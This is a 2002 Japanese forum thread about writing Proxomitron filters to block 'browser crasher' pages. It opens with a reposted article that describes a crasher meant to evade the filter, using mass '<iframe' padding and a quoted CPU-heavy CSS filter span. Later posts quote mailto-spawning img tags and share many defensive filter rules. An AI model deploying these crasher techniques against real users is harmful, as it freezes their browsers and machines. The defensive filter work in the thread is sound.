■Proxomitronにブラクラで対抗する またネトランの没ネタでも。 こんなネタ出すのはどうかと思うけど、似たようなネタが通ってるのはもっと どうかと思った。 ProxomitronはWebページに正規表現のようなもので置換を掛けて、気に入らな いタグを消し飛ばしてしまえる素敵ソフト。これを使えば、スペースとリソー スと通信帯域を無駄に消費するだけのうざったいバナーとかともおさらば出来 る。僕は使ってないけど。 ちなみに、OutPostFirewallというファイアーウォールソフトにも簡単なフィ ル多機能が付いているので、バナー程度ならカットできる。 Proxomitronを使えば大概のブラクラもカットできるわけだけど、じゃあその フィルタをかいくぐってブラクラを食らわしてやろうというのが今回の思いつ き。 オミトロンの弱点は、フィルタのマッチに結構な処理を要することにある。 文字を1文字ずつ調べて、パターンの始まりの文字を見つけたらその後ろを調べて、パターンにマッチしているか調べる。「任意の文字列」とかがパターン の中にあるとその次の文字がマッチするまで後ろを調べ続けてしまう。長さ制 限がついているので、無限に調べ続けてしまうことは無いけど、ワイルドカー ドの前の文字までマッチしてその後ろがマッチしない文字列が大量にあるとか なりの不可になる。
232 :
名無しさん@お腹いっぱい。 :02/10/23 08:42 ID:xnW5JOMg
だから、「<iframe」など、そんな感じの文字列を大量に埋め込んでおくと、 オミトロン自体がビジーになって、他のブラウザの表示にまで滞りが出るようになる。 5メガバイトほど「<iframe」を貼っておくと、かなり困ったことになる。ひとつのHTMLファイルからそのようなファイル(別のファイル名)にリンクしまくっ ておくのもいいかも。 しかし、これだけではそのページを閉じるだけで処理が終わってしまうので、 ブラウザ自体もビジーにしてしまおう。 ブラウザに負荷をかけるタグとしては何重にもネストされたTABLEタグなどがあるが、割と簡単にブロックできるし、それ自体が容量を喰ってしまうのであ まり良くない。 普通に無駄に負荷をかけるスタイルシートのフィルタを使おう。これは、文字 とか画像に影をつけたりかすれたようにしたりといった特殊効果をかけるもの で、複雑な物になるとかなりのマシンパワーを喰う。手当たり次第に「<span style="width:100%;filter:Shadow() Blur(direction=135, strength=5) FlipH() FlipV() DropShadow(color=silver) Glow(color=red) Wave(freq=2,strength=4);font-size:1000%;">」とか指定してやれば、数文字でも かなりの処理時間になる。そして、そのフィルタの対象は、前述の「<iframe」にする。HTMLタグなのでそのままでは表示されないが、 「<plaintext>」を使うことで表示されるようになる。これでかなり嫌な感じにマシンパワーを持っていくようになったはずだ。 何とかするには、ブラウザを強制終了するしかない。普通のIEならひとつのブ ラクラページが閉じるだけで済むが、タブブラウザを使ってると全てのページ がまとめて閉じられてしまい、一から再読み込みしないとならない。 マシン自体がフリーズしたりはしないだろうけど、かなり迷惑なんじゃないだ ろうか。
233 :
名無しさん@お腹いっぱい。 :02/10/23 08:42 ID:xnW5JOMg
ttP://cgi19.plala.or.jp/lukewarm/ より転載
ネトランのライターか? とりあえず日本語の勉強からやり直せ。
あぁ。転載ね。どれだけアフォな内容か理解できないから転載して反応を見たいのか。 それともネタにつまって他人に考えてもらおうとしたライターさん本人かな?
あら、向こうにも貼ってるのね。ネタ収集&宣伝目的の本人さんケテーイ? # 馬鹿らしいので内容に関するツッコミはナシで。 # 検閲してやる義理はない。
240 :
ぬる℃ :02/10/23 13:47 ID:???
すみません 糞と思っていたネトランに原稿ボツにされて むしゃくしゃしてつい三井くんをやっちゃいました
241 :
名無しさん@お腹いっぱい。 :02/10/23 14:18 ID:DnPAwT6a
Name = "Add Link 0.00+"
Active = TRUE
URL = "^*.((p|)jp(e|g|eg)|gif|png|bmp|js)"
Limit = 400
Match = "([^h])\1
ttp:// (((\&|\&(^[0-9a-z]+{1,6};)|-(^->)|[\[(][0-9a-z\-_.]+[\])]|[.,`;~])+[0-9a-z/:@?!%$+_=]+{1,*})+{2,*})\2([.\-!?]+)\3(^[0-9a-z/:@?!%~$+_\-.])(^ (#[0-9a-z\-_:.]+ |)(" |)[;`=|{}*\\>]|</a)"
Replace = "\1<a href="
http://\2 " target="_blank" title="Add Link 0.00+" style="text-decoration: none">
ttp://\2</a >\3"
242 :
名無しさん@お腹いっぱい。 :02/10/23 14:20 ID:DnPAwT6a
Name = "2ch bbs.cgi content changer"
Active = TRUE
URL = "[^.]+.(2ch.net|bbspink.com)/test/(sub|)bbs.cgi"
Limit = 256
Match = "(<meta[^>]++content=)\95;URL=$AV(\1) http-equiv=refresh>"
Replace = "\90;URL=\1 http-equiv=refresh>\k"
Name = "2ch Ad Killer (2002/08/28)"
Active = TRUE
URL = "[^/]++.(2ch.net|bbspink.com)/"
Limit = 10000
Match = "$URL(
http://[^/]+/test/read.cgi )"
" <font size=2>*</font>$STOP()"
"|"
"$URL(*/kako/*/[0-9]+{9,10}.html)"
" <center*(<a href=("|)/[^>]+>■掲示板に戻る■</a>)\#$STOP()"
"|"
"$URL(
http://[^/]+/[^/]+/ (index.html|(^?)))"
"("
" ($NEST(<table,</table>) <br>)\#*(<a name=$AV((#|)menu))\#"
" |"
" (subback.html[^>]+><b>*</table>)\#"
" $SET(#=<br><TABLE border=1 cellspacing=7 cellpadding=3 width=95% bgcolor="#EFEFEF" align=center><TR><TD>)"
" *((<dl>|)<a name=$AV(1))\#$STOP()"
")"
Replace = "\@"
243 :
名無しさん@お腹いっぱい。 :02/10/23 14:20 ID:DnPAwT6a
Name = "Protect Contents except Text(2002/010/07)"
Active = TRUE
URL = "$IHDR(Content-Type:^text/)"
Limit = 30000
Match = "$URL(^$LST(SafeList))(< (!DOC|[a-z])"
"$SET(#=<html>\n"
" <head>\n"
" <title>\n"
" HTML Contents Found\n"
" </title>\n"
" </head>\n"
" <body>\n"
" <h1>\n"
" HTML Contents Found\n"
" </h1>\n"
" <p>\n"
" URL:\n"
" <a href="
http://\xbweb..src..\h\p ">\n"
" \u\n"
" </a>\n"
" </p>\n"
" </body>\n"
"</html>\k)|\#)$STOP()"
Replace = "\@"
244 :
名無しさん@お腹いっぱい。 :02/10/23 14:21 ID:DnPAwT6a
In = FALSE
Out = TRUE
Key = "URL: FreeWeb -> isweb Automatic Changer"
Match = "
http://www ([0-9]++)\0.freeweb.ne.jp(/\?|\?|/)(?*)\#"
Replace = "$JUMP(
http://isweb\0.infoseek.co.jp/\@ )"
In = FALSE
Out = TRUE
Key = "URL: ime.nu/pinktower.com Automatic Jumper"
Match = "
http:// (ime.nu|pinktower.com)(/|\?)(\#)"
Replace = "$JUMP(
http://\@ )"
245 :
名無しさん@お腹いっぱい。 :02/10/23 14:22 ID:DnPAwT6a
In = FALSE Out = TRUE Key = "User-Agent: Phoenix 0.2 (Pescadero) (out) " Match = "*" Replace = "Mozilla/5.0 (Windows; U; Windows 95; en-US; rv:1.2b) Gecko/20010911 Phoenix/kkk"
tocさん更新キタ━━━━━━(゚∀゚)━━━━━━ !!!!!
>>246 _ , ― 、
,−' `  ̄ヽ_
,' ヽ
( )
( ノ`ー'ー'ヽ )
( ノ● ●( )
( 〉 -――-( )_ _
`ー'l ● ( ノ ヽ )
、‘ー'ー’ _ノ`ー' |
 ̄| ̄ |
/ /7 / ̄ ̄/ /
`ー´ `ー ´ `―´
249 :
名無しさん@お腹いっぱい。 :02/10/24 00:27 ID:LqREsg3o
Proxomitron入れたけど、ブラクラ踏んでえらいことになったぞ
ブラウザのProxy設定と対策フィルタ、後余計な好奇心の排除が必要です。
252 :
251 :02/10/24 06:24 ID:???
メールソフトは起動をmailtoで起動しないようにはしているのですがタスクマネージャを みるとたくさん起動されています。 フィルタはブラクラ防止のはひととおり入れてます。
デリ
254 :
251 :02/10/24 16:10 ID:???
>>251 のやつ保存してあるんですがブラクラあげても大丈夫なうpろだなんて
ありますかね?
無料アカウントとってアップ
256 :
251 :02/10/24 21:34 ID:???
257 :
251 :02/10/24 21:35 ID:???
>>257 Protect Contents except Text (2002/05/02)
259 :
251 :02/10/24 22:05 ID:???
あれ???Protect Contents except Text4.4のやついれてたんですがだめです。 (2002/05/02)の入れてみてもだめでした。 どうなってるんだ・・・?
Content-Length: always filter
おれもLimit 3000で防げたな。
265 :
259 :02/10/25 00:57 ID:???
Limit 3000でもだめだ・・・ブラウザはSleipnir、メーラーはEdmax おかしい・・・ブラウザが固まる
おれもだめ。なんでだろうなあ。 IEは6.0SP1
267 :
259 :02/10/25 04:52 ID:???
踏むとすぐCPU使用率100%になる。 タスクマネージャ見るとEdmaxがたくさん起動していて、ブラウザを終了させると 使用率も元に戻る。Edmax標準のブラウザに指定してないのになあ・・・
俺はDonut RaptでメーラーはOEだけど防げたよ。 タスクマネージャー見てたけどメーラーは起動せず。 ただ、同じようにCPU使用率100になっててProxomitronの使用率が 80前後になってた。タブブラウザだとn閉じてもだめなのかな?
>>268 ページ閉じないとだめってほんとに防げたのかよー
>>270 ホスト名調査に失敗と出るけどこれって防げてる?
ふーむオレもなるな
help嫁
Name = "Protect Contents except Text(2002/010/07)+"
Active = TRUE
URL = "$IHDR(Content-Type:^text/)"
Limit = 30000
Match = "$URL(^$LST(SafeList))(< (!DOC|[a-z])"
"$SET(#=<html>\n"
" <head>\n"
" <title>\n"
" HTML Contents Found\n"
" </title>\n"
" </head>\n"
" <body>\n"
" <h1>\n"
" <font color="red">Browser crusher !? </font> \n"
" </h1>\n"
" <p>\n"
" URL:\n"
" <a href="
http://\xcgi.coara.or.jp/cgi-bin/cgiwrap/tkuri/BCC/bcc.cgi? http://\h\p ">\n"
" \u\n"
" </a>\n"
" </p>\n"
" </body>\n"
"</html>\k)|\#)$STOP()"
Replace = "\@"
275 :
名無しさん@お腹いっぱい。 :02/10/25 17:16 ID:sgKSYT5D
>>270 ホスト名調査に失敗
Proxomitronは次の名前のサイトを発見できませんでした…
dbug..aomori.cool.ne.jp
名前が正しいかチェックして下さい。正しいならば
win板の方のFAQを読んできなー
ついにtocさん更新キタ━━( ´∀`)・ω・) ゚Д゚)・∀・) ̄ー ̄)´_ゝ`)`Д´)-_-)冫、 )ノД`)=゚ω゚)━━!!!
プレフィクス
280 :
名無しさん@お腹いっぱい。 :02/10/25 20:12 ID:H0Qq+oFW
>>281 [Unexpected Protocol Found]
[Protocol src killed]
がいっぱい。
>>281 このURLピンク板のリンク先にあった〜よ。
おみとろん通してて助かったわ。4.3とjpgに対処できるフィルタに感謝m(__)m
>>270 dbugで見る限りProtect Contents except Textが
効いてるみたいになんだけど
実際にそのURLを開いてみるとメーラーが大量に…
デバッグしたら何のフィルターも効いてないし(;´Д`)
286 :
名無しさん@お腹いっぱい。 :02/10/26 01:13 ID:sYf5PB+u
たった今、導入してみたが全くバナーが消えてないぞ・・・・ どういうことだ?
288 :
名無しさん@お腹いっぱい。 :02/10/26 01:31 ID:k33EMABy
サッパリわからん yahoo行ったらやっぱりyahooの下のバナーがバリバリ動いてた。 『アクティブな接続 : 00』 ってなってるけどこれに問題があんのか これって接続できてないってことだろ
「アクティブな接続」の意味が分かってないのに オミトロンを使おうとしてる馬鹿丸出しの初心者がいるスレはここですか?
Proxyの使い方がわからない人は 当然のことながらLocal Proxyである Proxomitronの使い方もわかりません。
291 :
名無しさん@お腹いっぱい。 :02/10/26 02:18 ID:k33EMABy
popup広告は出てこないから 効いてるみたいだが 普通のバナーが消えねぇ・・・。
293 :
名無しさん@お腹いっぱい。 :02/10/26 02:40 ID:k33EMABy
>>269 メーラーは起動しなかったけど防げてなかったみたい(;´Д`)
過去ログ参照していろいろいじってたら防げるようになりました
>>293 それは当然然るべきフィルタを適用した上での発言だな?
外部スクリプトや外部スタイルシートは、ブラウザにもよるだろうけど拡張子もMIMEも問わないらしい。 面倒くさければ全てOffにするのが楽だけど、呼び出し元で拡張子をチェックしてさらに 拡張子によるMIME修正すれば安全なヤツは大抵通るかな。 つかこれOBJECT要素にもいえることか?
298 :
名無しさん@お腹いっぱい。 :02/10/26 10:35 ID:c8BsHXy+
今サングラスをしていますか?
Name = "Browser Crusher Check Button"
Active = TRUE
Limit = 8
Match = "<end>"
Replace = "<br><br><br><br><br><br><br><br><br><br><hr>
<FORM action=
http://www.jah.ne.jp/~fild/cgi-bin/LBCC/lbcc.cgi?url=\u method=post><INPUT type=hidden value=\u name=url><INPUT type=submit value="Check"></FORM><end>"
作ってからわかった
無意味だこれ(゚∀。)
つーかアレだな、他人の作ったフィルタを理解して使ってるヤシなんか相当小数なんだろうな。 見てわかるような人なら、自分で作ってるだろうし。 いまだに画像が壊れます話題やってるのを見ると、ホントそう思う。
だよな 未だに256とか30000とか言ってんだもんな Protect Contents〜なんかすごく単純なのにな・・ きっと理解しようとさえしてないんだろうな もしかしたらReadmeすら読んでないのかもな
305 :
名無しさん@お腹いっぱい。 :02/10/27 08:17 ID:qSWlIl80
理解なんぞする必要なし ただ過去ログ、しかも今見てるスレの検索位しろよなヴォケども って事だろ。 >305 いちいちあげんなよ 構ってクン
309 :
名無しさん@お腹いっぱい。 :02/10/27 15:34 ID:yE1GRiTn
312 :
名無しさん@お腹いっぱい。 :02/10/27 16:47 ID:T3I4VPXU
引き際を知れ
人間bラクラばかー
何にせよ平和なことで。 目新しいブラクラよこせー。 ガイシュツのは全部対応したつもり。多分。
316 :
名無しさん@お腹いっぱい。 :02/10/27 19:55 ID:pmvT9K/d
まぁ2chは教えて君の憩いの酒場なんです
酒を飲みたくなりますね
( ´▽`)つ▼マアイッパイドウゾ
>>312 ( ´,_ゝ`) ボク、何がか説明してくれる?
▼_(・∀・)イタダキ マンモスー!ー
<img src=に画像以外のURLが入ってる場合を潰したいんだが なかなイイのかできない… boundsは <img\s*>として *src=("|'|)(((([^?]++)/)+)\1(^.jpg|gif|png|bmp)|\1(^.jpg|gif|png|bmp))("|'|\s)* だと普通の画像も潰してしまう… 教えてエロイ人…
やっとtocさん更新キタ━━━━━━(゚∀゚)━━━━━━ !!!!!
>>321 ビミョーにブラクラ関係話題じゃないような気がするけど。
*src=$AV(((^.(jpg|gif|png|bmp))?)+)*
こんなんでどう?
src=mailto:hoge.jpgとかは通過しちゃうから、対ブラクラの役には立たんけど。
イメタグから呼ぶcgiカウンターとかは大体潰れるので、そっち目的?
話変わるけど、半角あたりに「エロに役立つProxomitronフィルタスレ」ってあったらいくない?
>>323 いいとは思うけど、すぐスレが潰れるに500banner killer
>>286 みたいな馬鹿とか、「最強の設定ファイルください」みたいなレスばかりになるよ
>>「最強の設定ファイルください」 ワロタ
>>324 「最強の設定ファイルください」みたいなレスばかりになるよ←ホントになりそうだ。
ソフ板でも最近そんなのばっかだし。半角じゃ(略
∩( ´Α`)< 先生、最強の設定ファイルください
Killfile.txt *
331 :
名無しさん@お腹いっぱい。 :02/10/28 20:44 ID:8P2t+BWo
そろそろオフ会でもやりませんか? オミトロンについて酒でも飲みながら語りましょうよ
332 :
321 :02/10/28 21:57 ID:???
>>323 何も引っ掛かりませんですた…全て素通ししてしまい(;´Д`)ィェァ
mailto:hage.jpg等については、プロトコル部分がhttpじゃないので他のフィルタで潰す予定で
(もちろん統合できる物なら統合したいのが本音)
素直に、imgは画像のみしか指定されて無い状態にしてブラウザに読ませたいんです(´・ω・`)
imgタグに画像以外のURLが記述されるのは普通ありえないし
ブラウザ側もそう言う場合は想定してないから、そこに問題があると思うんで
(ブラクラ以外でもcgiカウンターぐらいにしか使われない)
それを潰すとimg使ったブラクラは殆ど潰してしまえるんではないかと。
で、こっちに書いた次第でして(;´Д`)ダメ?
スレ違いのなら(もし今後何か書く時は)あっちに移動します お騒がせしました
333 :
321 :02/10/28 22:02 ID:???
最後に一つだけ訂正… 素通しと言うのはこちらの手違いで そのMatchでおおかたOKぽかったです これからブラックボックステストで全部チェックしてみてあとは自分で何とかします 重ね重ねお騒がせしました…
334 :
名無しさん@お腹いっぱい。 :02/10/29 20:08 ID:4giITJ1M
あげてみる
335 :
:02/10/30 14:41 ID:6mVWKsD1
俺はブラクラよりイメクラだな
俺はイメクラあまり好きくない。よって却下
>>336 イメクラ対策のフィルタ書いてください。
幼ポ法対策のフィルタ書いてください。
k察対策のフィルタ書いてください。
税金対策のフィルタ書いてください。
駐禁対策のフィルタ書いてください。
>336のためにも 性病対策のフィルタを書いてください。
tocの更新さぼり対策のフィルタを書いてください。
347 :
toc :02/10/31 00:06 ID:???
トリップは忘れた。
>>346 いや、ずっとこのスレ見てたんだけどね(w
いま4.4用に書き直されたフィルタをみんな使ってるのかな?
あれってぜんぜんそのフィルタの意味がなくなってるから
書き直そうと一週間くらい前に一度だけ考えてみたんだけど、
どうしてもいい方法が思い浮かばないので放置してました。
Protect〜フィルタはダウンロードしたデータをすべて
「一番先に」マッチさせることで、HTML以外のデータが
それ以降のフィルタで壊されないようにしてるんだけど、
それをやると4.4では同じデータに何回もマッチしてしまうのか、
CPU使用率が100%になってしまう。
これはどうしようもないので4.4ではむしろProtect〜自体を
使わないほうがいいと思う。んで、それだけだとデータが
よく壊れるので、それとともにヘッダフィルタのalways filterも
無効にしないといけない。
そうなると今度はjpgとかの拡張子を偽装したブラクラの対策を
どうするか、という問題に逆戻りするけど、
2ch Add Thumbnail (2001/11/13)を使ってると画像じゃない
場合は表示されないし、最近は画像ビューワ付2chブラウザを
使ってる人も多そうだし、もういらないかなーみたいに思ってます。
348 :
名無しさん@お腹いっぱい。 :02/10/31 00:30 ID:nCXxqAOz
tocキタワァ*・゜゚・*:.。..。.:*・゜(n‘∀‘)η゚・*:.。. .。.:*・゜゚・* !!!!!
向上心の無い人はもう要りません
>>347 ほんまにきた〜!!w
結局、バージョンアップしないでブラクラ対策フィルタを使っております
352 :
349 :02/10/31 00:40 ID:???
はい?
353 :
349 :02/10/31 01:12 ID:???
で沈黙、と。347は騙りでファイナルアンサー?
354 :
toc :02/10/31 01:16 ID:???
351さんは 「向上心の無い人」=TOC氏 と解釈したわけですね。 つまり、(俺も思ってるがそれは口に出すことじゃないだろ…)→おい! まあそんな揚げ足はどうでもいいんですが、 自分でフィルタの改良もせず、TOC氏光臨キボンヌキボンヌ言ってたのが見苦しかっただけです。 それとフィルタが44に対応できなかったからと言って そもそも必要無いなどと言い張るTOC氏もどうかと思いました 「○○使えば必要無い」と言う話題ならばスレ違いだし、そもそもスレの存在意義の否定に他ならないかと。 画像表示できないテキストブラウザ使えばオミトロ無くても大丈夫 ビューワ付き2chブラウザ使えばBYPASSで問題無い 何の意味が? 347の自称TOCがTOC氏本人とは限らないですが、 本人なら 4.4用のProtect〜は 少なくとも自分には無理だった とか言いようがあるでしょう。 自分が出来なかったから他の能無しにできるわけが無い→4.4では無理だ→そもそも必要無いだろう みたいな感じで非常に見苦しいです。(あくまでも私がそう感じただけ 一応念のため) と暗に批判してみたんですが、一行では伝わりませんでしたか そうですか。 尚、縦読みその他アナグラム等は仕込んでありません
旦~~
357 :
toc :02/10/31 01:32 ID:???
>>355 当然
>>349 でそこまで伝わるわけないですね。
そう書いてもらえればわかります。
いちおうProxomitronの更新履歴を見ましたが、
今回のCPU使用率100%の原因となる記述は
見つけられなかったので、Protect〜の4.4対応はできない、と
いう意味で「使わないほうがいい」と書きました。
一度マッチしたらSTOPさせるようなフィルタだと
画像の壊れは防げないので
今4.4用に流通しているものは意味のないものです。
そのあとの補足が見苦しいというのは
あなたの主観なのでどうでもいいのですが、
こうすればjpgなどの対策はできるよ、と
一応説明しただけです。
358 :
toc :02/10/31 01:33 ID:???
>>355 当然
>>349 でそこまで伝わるわけないですね。
そう書いてもらえればわかります。
いちおうProxomitronの更新履歴を見ましたが、
今回のCPU使用率100%の原因となる記述は
見つけられなかったので、Protect〜の4.4対応はできない、と
いう意味で「使わないほうがいい」と書きました。
一度マッチしたらSTOPさせるようなフィルタだと
画像の壊れは防げないので、今4.4用に
流通しているものは意味のないものです、ということであって、
Protect〜フィルタがそもそも必要ないという意味ではありません。
そのあとの補足が見苦しいというのは
あなたの主観なのでどうでもいいのですが、
こうすればjpgなどの対策はできるよ、と
一応説明しただけです。
359 :
toc :02/10/31 01:34 ID:???
あら2重投稿スマソ。あとに投稿したほうが校正済みのやつです
反応しないが吉
361 :
toc :02/10/31 01:41 ID:???
>>360 反応というか説明は必要だと思いました。
今でもとりあえず安全そうだからよくわからないけど
入れつづけて、なんかバグフィックスされてるから4.4に
バージョンをあげたらおかしくなって、という人も多そうですし。
久しぶりにハンドル入りで書いてるのに
言葉が多いから「必死だな」と受け取られそうですが、
とくに煽ってるわけではないです。
4.4にバージョンアップする事によるメリットを得てない罠。 まぁ$KEYCHK()は良いとは思うけど…
4.4は致命的なバグ持ってる気がする。以前出てた Match="?" Replace="-" のヤツとか。例えば「test1234567」をテストしてみると 前のでは「-----------」になるのに4.4では「-e-t-2-4-6-」になるってやつ
365 :
名無しさん@お腹いっぱい。 :02/10/31 05:17 ID:vWin/iOt
誰か、今使ってるフィルターをまとめて固めてどこかにUPしてくれませんか?
>>365 win板のスレの1にほとんどうpされているからそれを使え
クレクレ君ウザイ
>>358 175-176や215を嫁。
画像の壊れなんざ余裕で防げるよ。
IEは拡張子でもMIMEでもなく、中身の先頭で判断するから
1.MIMEに関係なく$FILTER(true)
2.$TYPE(oth)でMIME偽装チェックフィルタ(IEがファイルをhtmlと判断する文字列を検出するフィルタ)
3.(^$TYPE(oth))でその他全てのフィルタ
とすることで
・MIMEがtext/html、実際の中身もhtmlは3
・MIMEがimage/jpeg、実際の中身もjpgは2(書き換えない)
・MIMEがimage/jpeg、実際の中身はhtmlは2(書き換える)
が、フィルタきちんと書いてれば意図しないマッチはないはず。
MIMEがtext/html、実際の中身はjpgの場合だけ意図せず誤爆する可能性は有るけど、
普通jpgはimageで来るからサーバの方に変な意図がなければ問題無い。
どうしてもコレが起こって画像が壊れるなら、そのサーバかなんか単位でMIME Fixしてやればいい。
あとフラッシュのブラクラ対策フィルタも(^$TYPE(oth))だと問題有るから、これは付けない。
つかそもそも拡張子偽造したブラクラって何?
ProxomitoronはMIMEでフィルタ有無の判断するんだけど、拡張子がなんの関係有るの?
漏れの知らないブラクラの話だったら、的外れなこといってごめんなさい。
>>363 だからソレTest Windowだけ。実際は問題ネェヨ。
何を解りきった事を逝っているのですか?
369 :
toc :02/10/31 12:18 ID:???
画像の壊れとはProtect〜自身が起こすのではなく、
Protect〜以降のフィルタがマッチすることで起こります。
たとえば
ttp://www.interq.or.jp/sun/thesnake/SAVE006118.jpg はKUPがマッチします。
これはどうでもいいことですが、
私が拡張子偽装と言っているものは
http://toc.dyndns.org/bc/test01.jpg のような本来拡張子がhtmlであるべきところを
jpgとすることで「ユーザーが」画像かと思って
安心して踏んでしまうHTMLのことです。
実際試しましたが、
>>175 で紹介されているフィルタも
Protectできていないと思います。もちろんIEでの話です。
4.3までで利用するProtect〜フィルタは、単にHTML特有のタグを発見して
警告するだけが目的ではなく、さらに、HTMLタグが見つからなければ、
すべてのデータに対して「ほかのどのウェブフィルタよりも先に」
マッチさせることでほかのフィルタによるマッチを防ぐことが目的です。
Match="\#"
Replace="\@"
という表現でCPU使用率が100%になる以上、
すべてのデータに先にマッチさせるという方法は
4.4では使えません。
>>369 理解した。が納得はしてない。
要するに、フィルタ一個足して他のフィルタはいじらないでおこうという考えか。
オレはそうじゃなくて、175のフィルタとの併用で
>画像の壊れとはProtect〜自身が起こすのではなく、
>Protect〜以降のフィルタがマッチすることで起こります。
ならば、そのProtect〜以降のフィルタに手を入れるべきでは?と言っているのだが。
利点としては、
・先頭数バイトを見て既に安全と解っている画像にProtect〜が無駄な時間をかけない。
・Protect〜が画像ファイルの後半で誤爆することがない。
欠点としては、多少書き換えが面倒というのはあるが、テキストエディタなら一発だ。
Image Checkerが出た頃も画像が壊れるってゆー同じ問題が出たんだよね 他のにいちいち追加しなけりゃいかんというのは面倒ねーって言ってて んで、しばらくしたらImage Checker Afterが出て解決したと
(´ー`)y-~~ フッ 難しすぎて全然分かんね〜 なんとなく適当に、ここのフィルタ追加してるだけで 俺は問題ないから、みんなには感謝してるよ。 アリガトネ
>>369 あと、どうしてもっていうなら
Match="(?+{1,*})\#"
Replace="\@"
でどうだ?
[HTTP headers] In = TRUE Out = FALSE Key = "URL: hoge1 (in)" URL = "$FILTER(true)" [Patterns] Name = "hoge2" Active = TRUE URL = "$TYPE(oth)" Limit = 255 Match = "((*<(html|head|body|img|table|script))\#$SET(\0=<plaintext>)|)" Replace = "\0\@$STOP()" Name = "hoge3" Active = TRUE Limit = 65536 URL = "$TYPE(oth)" Match = "(?+{1,*})\0" Replace = "\0" 他のフィルタを書き換えたくない人向け。 hoge2はウェブフィルタの先頭に。 hoge3のリミットはいくらでも構わない。 hoge2とhoge3の間に対.swfのフィルタとか入れること。それ以外は入れないこと。
375 :
349 :02/10/31 15:19 ID:???
ネタのつもりでボソッと言ったのたこんなにhattenするとは(;´Д`) てか、俺が言ったのは最初の一言だけです…tocさんゴメンなさい
俺も謝っといてあげる。ごめんなさい。 そしてありがとう。
hoge3修正。こっちのが圧倒的に早い。 Name = "hoge3" Active = TRUE Limit = 65536 URL = "$TYPE(oth)" Match = "(^(^?))(\0)" Replace = "\0"
Match = "(?*)\0" これじゃダメ?
あー。それでいいや。というかそれが一番早い鴨。
くっそー。POSTデータが扱えれば強制fusianasanフィルタが作れるのに。 ウェブフィルタだとブラウザで書き込んでる人しか引っかけられないからなぁ。
( ´,_ゝ`)
ブラウザじゃなかったら何から書きこんでるの? 漏れも使ってみたい
結局、以前のProtect(略)の $IHDR(Content-Type: (^text/)*) (< (!DOCTYPE|html|head|body|img|table|frameset|(i|)frame|ilayer|script)[^>]++> $SET(#=<html>〜中略〜</html>\k)|\#)←ここを(?*)\#にしてもダメだった と言うか上の方、高尚過ぎて理解できませんでした… 教えてエロイ人
Match = "$IHDR(Content-Type: (^text/)*)"
"(< (!DOCTYPE|html|head|body|img|table|"
"frameset|(i|)frame|ilayer|script)[^>]++>)"
"$SET(#=<html>\n"
" <head>\n"
" <title>\n"
" HTML Contents Found\n"
" </title>\n"
" </head>\n"
" <body>\n"
" <h1>\n"
" HTML Contents Found\n"
" </h1>\n"
" <p>\n"
" URL:\n"
" <a href="
http://\xbweb..src..\h\p ">\n"
" \u\n"
" </a>\n"
" </p>\n"
" </body>\n"
"</html>\k)$STOP()"
ありがとうエロイ人
386 :
750 :02/11/01 06:36 ID:???
迂闊だった・・・この俺としたがフィルターをぶち込むことに満足して 肝心のおみとろんをバイパスしていることに気づかずブラクラを踏むとはな・・・
>>387 俺はこんな風になった
------------ここから------------
//
<html>
<body>
<img src=mailto:1>
------------ここまで------------
になった。
なんでmailto:ひとつだけ残ってんだろ…
>>387 おわっ、前のバージョンにブラクラフィルターいれてるのにメーラーが一つ立ち上がった!
同上
391 :
名無しさん@お腹いっぱい。 :02/11/01 16:28 ID:L+5RaQZw
同じくメーラーが起動された まぁここは他力本願でいくか。
>>387 imgがひとつ残ったというか、引用部分がソースそのもの。
で、
(1)Protect Content except Text
(2)Image Checker
(3)Image Checker After
の3つのフィルタが関係してるみたい。
A. (1)を入れてる場合
ソース全体が(1)にマッチして消費されるために、プロトコル潰し系のフィルタにマッチしない。
B. (1)をはずして、(2)、(3)が入っている場合
(3)にマッチ、消費されてimgが残る。
C. (2)のみ適用
(2)にマッチしてセーフ。
D. 3つとも入れていない場合
content-typeでチェックするフィルタを入れてないとhtmlとして表示されるが、
プロトコル潰し系があればセーフ。
こんな感じ。
content-typeのチェックをしないでプロトコル潰し系だけだと問題あるかな?
俺はKerio(3.0.0B3)を併用してるのでメーラーの起動を制御できた。
4.4仕様のフィルタ誰か作って
>>396 削除系板の書き込みIPアドレスを他の板で晒しカキコするとヤバイみたいよ?。
批判要望板でそんな話出てた。
あんまやらん方がよいぞ
>>397 その件に関してはタラコ直々に言及してたような。。。
402 :
名無しさん@お腹いっぱい。 :02/11/01 19:53 ID:Nu4uP7+3
dbugってけっこうまぶしーよ。 目が痛い
>>374 これってなんのブラクラを防ぐフィルタですか?
KUPって誤爆多いよね。 俺は誤爆がウザくてKUPはOFFにしてる。 代わりにBadImageKiller使ってるけど 誤爆少ないわりには効果も悪くない感じ。 BadImageKillerは通してKUPなら防げるようなブラクラってある?
>>406 ぐぐっても出てこないようなフィルタは場所も示してくれんと答えようがない。
Name = "Bad Image Kill" Bounds = "<(img|image)*>" Match = "*( src=((^\w.(jp(e|)g|gif|png|bmp)[>"'%09%0D%0A%81 ])*))"
<img src="mailto:hoge.jpg">←マッチせず <img src="ho ge.jpg">←マッチする 全然駄目じゃん。
Match = "*( src=((^\w.(jp(e|)g|gif|png|bmp)[>"'%09%0D%0A%81 ])*)|mailto:*)" でOK牧場。
<img src="telnet:hoge.jpg">
<img src="
ftp:hoge.jpg ">
<img src="mailto:hoge.jpg">
Match = "*( src=((^*.(jp(e|)g|gif|png|bmp)[>"'%09%0D%0A%81 ])*)|mailto:*|\*)"
で今度こそOK牧場。
telnet:と
ftp:は他フィルタでよろしく 。(あきらめモード)
Name = "Trinity's Protocol Killer"
URL = "<[^!>][^>]++(src|href)=("[^"=?]++:[^"]++"|[^ "=?]++:[^ "]++)(\s*|)>"
Match = "<\0(src|href)\1=("|)\2(^ http(s|):|
ftp:| mailto:| javascript:)\3>"
Replace = "<\0\1-killed=\2\3>"
パクってみるテスト。
URL = "<[^!>][^>]++(src|href)=("[^"=?]++:[^"]++"|[^ "=?]++:[^ "]++)(\s*|)>"
Match = "*( (src|href)=((^(("|'|)
http://|\.+{0,2}/ )\w.(jp(e|)g|gif|png|bmp)[>"'%09%0D%0A%81 ])*))"
ダメ出し/修正 おながいします
>>414 URL(Boundsの間違いかな?)パクったからには 拡張子が画像とは限らない
Bad Image KillのReplaceは無記入でOKなんですか?
<img src="hoge.jpg .html"> まぁガンバレ、と言いたいところだが諦めたら? 拡張子とURI schemesの制限を一つのフィルタでやることはできるとおもうけど、 貴方の場合それ以前にいろいろわかってないことが多い気がする。 \wの使い方とか。どういうブラクラがあって、それをどう防ぐかとか。 拡張子を制限することで、どういうブラクラを防ぎたいの?
と言うか それに手を加えててのは同一人物だったのか? …スマン 俺も少し弄くった
419 :
